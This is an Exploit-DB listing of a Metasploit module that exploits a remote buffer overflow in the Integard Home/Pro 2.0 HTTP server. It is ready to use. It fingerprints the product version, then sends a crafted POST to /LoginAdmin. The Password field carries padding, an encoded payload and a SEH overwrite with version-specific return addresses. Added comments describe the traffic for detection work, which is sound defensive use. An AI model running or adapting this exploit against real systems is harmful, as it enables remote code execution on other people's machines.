Integard Home and Pro 2 – Remote HTTP Buffer Overflow

  • 作者: Lincoln, Nullthreat, rick2600
    日期: 2010-09-07
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/14941/
  • class Metasploit3 < Msf::Exploit::Remote
    
    	# HttpClient mixin -- presumably the source of the connect / disconnect /
    	# send_request_raw helpers that #exploit calls; confirm against the framework.
    	include Msf::Exploit::Remote::HttpClient
    
    	# Declarative module metadata for the Integard Home/Pro 2.0 HTTP server overflow:
    	# payload constraints, two fixed targets (each with its own 'Ret' address) plus an
    	# auto-detect entry, and the default port. Target selection itself happens in #exploit.
    	#
    	# @param info [Hash] framework-supplied module info, merged by update_info
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Integard Home/Pro version 2.0',
    			'Description'=> %q{
    					Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
    			},
    			'Author'=>
    				[
    					'Lincoln',
    					'Nullthreat',
    					'rick2600',
    					'corelanc0d3r' 
    				],
    			'License' => MSF_LICENSE,
    			# SVN keyword placeholder; it was never expanded in this copy.
    			'Version' => '$Revision: $',
    			'References'=>
    				[
    					['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
    				],
    			'DefaultOptions' =>
    				{
    					'EXITFUNC' => 'thread',
    				},
    			'Payload'=>
    				{
    					'Space'=> 2000,
    					# The encoded payload is sent inside a form-urlencoded POST field
    					# (see #exploit); these are presumably the bytes that would end or
    					# reshape such a field: NUL, space, '&', '/', '=', '?', '\'.
    					'BadChars'=> "\x00\x20\x26\x2f\x3d\x3f\x5c",
    					'StackAdjustment' => -1500,
    				},
    			'Platform' => 'win',
    			'Privileged' => false,
    			# 'Ret' is the version-specific value #exploit packs into the last four
    			# bytes of the buffer; target 0 chooses between the other two by fingerprint.
    			'Targets'=>
    				[
    					[ 'Automatic Targeting',{ 'auto' => true }],
    					[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
    					[ 'Integard Pro2.2.0.9026', { 'Ret' => 0x0040362C,}],
    				],
    			'DefaultTarget'=> 0))
    
    		# Integard's HTTP listener port; the auto-detect probe and the overflow
    		# request both go to it.
    		register_options(
    			[
    				Opt::RPORT(18881)
    			], self.class )
    	end
    
    
    	# Fingerprints the target when 'Automatic Targeting' is selected, then sends
    	# the overflowing login request and hands off to the payload handler.
    	#
    	# What this produces on the wire (useful when writing detections for it):
    	#   1. Auto target only: GET /banner.jpg; the Content-Length header decides the
    	#      edition -- "24584" = Home (targets[1]), "23196" = Pro (targets[2]);
    	#      anything else aborts and nothing further is sent.
    	#   2. POST /LoginAdmin whose Password= field is 3104 bytes: uppercase alpha
    	#      padding + encoded payload (3091 bytes together) + 5-byte jmp + 4-byte
    	#      nSEH + 4-byte SEH (the target's Ret, little-endian). A field of that
    	#      size in a login form is very unlikely to be legitimate traffic.
    	#
    	# NOTE(review): the 'Host' and 'Content-Length' headers of the final request
    	# are hard-coded ('192.168.1.1:18881' and 1074) rather than derived from the
    	# configured host/port or from post_data, so they reflect the authors' lab
    	# setup rather than the request actually built here.
    	def exploit
    		mytarget = target
    		continueattack=true
    		if(target['auto'])
    			mytarget = nil
    			print_status("[*] Automatically detecting the target...")
    			connect
    			# Probe: the bundled banner.jpg differs in size between the two editions.
    			response = send_request_raw(
    			{'uri' => '/banner.jpg', 
    			'version' => '1.1', 
    			'method' => 'GET'
    			}, 5)
    			# NOTE(review): if no response came back (nil), this raises instead of
    			# falling through to the "Unknown Version" branch.
    			contlength = response['Content-Length']
    			if (contlength == "24584")
    				print_status("[!] Found Version - Integard Home")
    				mytarget = self.targets[1]
    			elsif (contlength == "23196")
    				print_status("[!] Found Version - Integard Pro")
    				mytarget = self.targets[2]
    			else
    				# Unrecognised build: no Ret is known, so the attack is skipped entirely.
    				print_status("[-] Unknown Version")
    				continueattack=false
    			end
    			disconnect
    		end
    		if continueattack
    			print_status("[!] Selected Target: #{mytarget.name}")
    			print_status("[*] Building Buffer")
    			pay = payload.encoded
    			# Pad so that junk + payload is always 3091 bytes, keeping the trailing
    			# jmp/nSEH/SEH bytes at a fixed offset regardless of payload length.
    			junk = rand_text_alpha_upper(3091 - pay.length)
    			jmp = "\xE9\x2B\xF8\xFF\xFF"
    			nseh = "\xEB\xF9\x90\x90"
    			# Version-specific Ret from the selected target, packed as 32-bit little-endian.
    			seh = [mytarget.ret].pack('V')
    			buffer = junk + pay + jmp + nseh + seh
    			print_status("[*] Sending Request")
    			# The buffer rides in the Password form field; the remaining fields mirror
    			# a normal admin login submission.
    			post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
    			req = "/LoginAdmin"
    			connect
    			send_request_raw({
    				'uri' => req,
    				'version' => '1.1',
    				'method' => 'POST',
    				'headers' => 
    					{
    					'Host' => '192.168.1.1:18881',
    					'Content-Length' => 1074
    					},
    				'data' => post_data
    				}, 5)
    			print_status("[*] Request Sent")
    			handler
    		end
    	end
    end